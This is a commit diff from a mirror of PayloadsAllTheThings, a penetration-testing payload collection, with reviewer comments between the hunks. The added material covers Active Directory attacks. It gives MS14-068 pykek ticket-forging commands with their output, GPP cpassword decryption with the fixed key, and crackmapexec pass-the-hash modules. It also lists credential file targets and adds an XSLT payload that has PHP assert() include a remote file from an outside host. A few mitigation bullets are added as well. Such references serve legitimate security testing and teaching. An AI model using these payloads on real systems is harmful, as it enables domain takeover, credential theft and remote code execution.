mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00

AD mitigations

parent 1535c5f1b3
commit 4b10c5e302
@ -117,6 +117,8 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
|
|||||||
/home/$USER/.bash_history
|
/home/$USER/.bash_history
|
||||||
/home/$USER/.ssh/id_rsa
|
/home/$USER/.ssh/id_rsa
|
||||||
/var/run/secrets/kubernetes.io/serviceaccount
|
/var/run/secrets/kubernetes.io/serviceaccount
|
||||||
|
/var/lib/mlocate/mlocate.db
|
||||||
|
/var/lib/mlocate.db
|
||||||
```
|
```
|
||||||
|
|
||||||
### Interesting Windows files
|
### Interesting Windows files
|
||||||
|
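Review bot: the two paths added to this Linux list, `/var/lib/mlocate/mlocate.db` and `/var/lib/mlocate.db`, read as two spellings of the same file; the mlocate package keeps its database at `/var/lib/mlocate/mlocate.db`, so either drop the second entry or say which distribution puts it at the shorter path. A few words on why the file is worth collecting (the updatedb index lists every path on the host that was indexed) would also help, since none of the entries in this block carry a description and the hunk header shows the surrounding text does explain the UNC case.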
@ -9,7 +9,7 @@
|
|||||||
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||||
- [Open Shares](#open-shares)
|
- [Open Shares](#open-shares)
|
||||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||||
- [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
||||||
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
||||||
- [Using ndtsutil](#using-ndtsutil)
|
- [Using ndtsutil](#using-ndtsutil)
|
||||||
- [Using Vshadow](#using-vshadow)
|
- [Using Vshadow](#using-vshadow)
|
||||||
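Review bot: the new table-of-contents entry `- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)` keeps a literal `&` in its fragment, so the link will not resolve: GitHub strips punctuation when it generates heading ids, which is exactly why the entry being replaced used `--` in place of its `&` (`#gpo---pivoting-with-local-admin--passwords-in-sysvol`). The fragment should be `#passwords-in-sysvol--group-policy-preferences`. While this list is being edited, the unchanged context line `- [Using ndtsutil](#using-ndtsutil)` misspells ntdsutil; if the heading is corrected, the entry text and its anchor need to change together.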
@ -214,11 +214,22 @@ Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
|||||||
```
|
```
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
|
# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
|
||||||
git clone https://github.com/SecWiki/windows-kernel-exploits
|
$ git clone https://github.com/SecWiki/windows-kernel-exploits
|
||||||
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
|
$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
|
||||||
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
|
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
|
||||||
python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
|
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
|
||||||
|
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
|
||||||
|
-1105
|
||||||
|
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
|
||||||
```
|
```
|
||||||
|
|
||||||
Then use `mimikatz` to load the ticket.
|
Then use `mimikatz` to load the ticket.
|
||||||
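Review bot: in the new pykek example the SID is broken across two lines inside the code block (`-s S-1-5-21-2928836948-3642677517-2073454066` followed by `-1105` on a line of its own), so the command cannot be copied and run as shown; join it into `-s S-1-5-21-2928836948-3642677517-2073454066-1105`. Adding the `$ ` prompt to the other commands is fine, but the block keeps its `powershell` fence for what are now Unix shell commands and their output; a plain or `bash` fence would match the prompt.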
@ -237,6 +248,11 @@ Linux> sudo date -s "14 APR 2015 18:25:16"
|
|||||||
Windows> net time /domain /set
|
Windows> net time /domain /set
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Mitigations
|
||||||
|
|
||||||
|
* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
|
||||||
|
|
||||||
|
|
||||||
### Open Shares
|
### Open Shares
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
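Review bot: the single mitigation bullet only covers the DCPromo QA step, but the check it describes applies to every existing domain controller just as much as to newly promoted ones, since MS14-068 is exploited against a DC that lacks KB3011780; the bullet should say that all DCs must be verified. The inline command `get-hotfix 3011780` should be in backticks like the other commands in this file, and because Get-HotFix filters on the HotFixID string, which carries the KB prefix, `Get-HotFix -Id KB3011780` is the form that actually matches.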
@ -317,11 +333,11 @@ IconIndex=1
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
### Passwords in SYSVOL & Group Policy Preferences
|
||||||
|
|
||||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||||
|
|
||||||
Find password in SYSVOL (MS14-025)
|
Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||||
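Review bot: renaming the heading to `### Passwords in SYSVOL & Group Policy Preferences` changes its generated anchor to `#passwords-in-sysvol--group-policy-preferences` (GitHub drops the `&` and keeps both hyphens), so the table-of-contents entry at the top of the file must use that exact fragment or the link breaks. The added sentence explaining SYSVOL is a good addition; two small wording points in the same region: `Find password in SYSVOL` should read `Find passwords in SYSVOL`, and the unchanged flag line misspells `Priorization` (`Prioritization`).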
@ -338,20 +354,22 @@ echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d
|
|||||||
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
||||||
```
|
```
|
||||||
|
|
||||||
Metasploit modules to enumerate shares and credentials
|
#### Automate the SYSVOL and passwords research
|
||||||
|
|
||||||
```c
|
* Metasploit modules to enumerate shares and credentials
|
||||||
scanner/smb/smb_enumshares
|
|
||||||
post/windows/gather/enum_shares
|
|
||||||
post/windows/gather/credentials/gpp
|
|
||||||
```
|
|
||||||
|
|
||||||
Crackmapexec modules
|
```c
|
||||||
|
scanner/smb/smb_enumshares
|
||||||
|
post/windows/gather/enum_shares
|
||||||
|
post/windows/gather/credentials/gpp
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* Crackmapexec modules
|
||||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
|
|
||||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
|
```powershell
|
||||||
```
|
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
|
||||||
|
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
|
||||||
|
```
|
||||||
|
|
||||||
List all GPO for a domain
|
List all GPO for a domain
|
||||||
|
|
||||||
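Review bot: the new sub-heading `#### Automate the SYSVOL and passwords research` is awkward English; `#### Automate the SYSVOL password search` says the same thing. The Metasploit module list keeps its c-tagged code fence, which will highlight module paths such as `post/windows/gather/credentials/gpp` as C source; an untagged fence (or `text`) is the right choice there, and the Crackmapexec block should use the same style rather than `powershell` for a Linux `cme` command.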
@ -364,6 +382,12 @@ Get-NetGPO
|
|||||||
Get-NetGPOGroup
|
Get-NetGPOGroup
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Mitigations
|
||||||
|
|
||||||
|
* Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
|
||||||
|
* Delete existing GPP xml files in SYSVOL containing passwords.
|
||||||
|
* Don’t put passwords in files that are accessible by all authenticated users.
|
||||||
|
|
||||||
### Dumping AD Domain Credentials
|
### Dumping AD Domain Credentials
|
||||||
|
|
||||||
You will need the following files to extract the ntds :
|
You will need the following files to extract the ntds :
|
||||||
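Review bot: the second bullet, `Delete existing GPP xml files in SYSVOL containing passwords`, removes the artifact but not the exposure: any password that was ever stored as `cpassword` has been readable by every authenticated user and decryptable with the fixed AES key shown earlier in this file, so the bullet should add that those passwords must be rotated, not only the files removed. It would also help to state that KB2962486 in the first bullet is the MS14-025 update, so readers connect it to the section's opening line. Minor: the curly apostrophe in `Don’t` should be a plain `'` for consistency with the rest of the file.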
@ -679,7 +703,7 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
|
|||||||
```
|
```
|
||||||
|
|
||||||
Mitigations:
|
Mitigations:
|
||||||
* Have a very long password for your accounts with SPNs
|
* Have a very long password for your accounts with SPNs (> 25 characters)
|
||||||
* Make sure no users have SPNs
|
* Make sure no users have SPNs
|
||||||
|
|
||||||
### KRB_AS_REP Roasting
|
### KRB_AS_REP Roasting
|
||||||
|
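Review bot: this section labels its mitigations with a plain `Mitigations:` line while the sections touched elsewhere in this commit use a `#### Mitigations` heading; pick one style for the file. The bullet `Make sure no users have SPNs` is too absolute, since service accounts need SPNs to function; the practical advice is that SPNs should not sit on accounts with human-chosen passwords, with group Managed Service Accounts (random, automatically rotated passwords) used where the service supports them. The `> 25 characters` addition is a useful concrete threshold.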
@ -132,6 +132,20 @@ Execute the function `scandir`.
|
|||||||
</xsl:stylesheet>
|
</xsl:stylesheet>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute a remote php file using `assert`
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||||||
|
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||||||
|
<xsl:variable name="payload">
|
||||||
|
include("http://10.10.10.10/test.php")
|
||||||
|
</xsl:variable>
|
||||||
|
<xsl:variable name="include" select="php:function('assert',$payload)"/>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
```
|
||||||
|
|
||||||
Execute a PHP meterpreter using PHP wrapper.
|
Execute a PHP meterpreter using PHP wrapper.
|
||||||
|
|
||||||
```xml
|
```xml
|
||||||
|
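Review bot: the added `assert` example should state the conditions under which it works, otherwise readers will not understand why it fails in most environments: the string `include("http://10.10.10.10/test.php")` is only evaluated as code by `assert()` in PHP 7.x and earlier (PHP 8.0 stopped treating string arguments to `assert()` as code), and fetching a remote file through `include` additionally requires `allow_url_include=On`, which is off by default. Naming both prerequisites in the sentence above the block also tells defenders which settings close this path. As with the `scandir` example above it, the `php:` namespace is only available when the XSLT processor has registered PHP functions (`registerPHPFunctions()`), which the text should say once for the whole section.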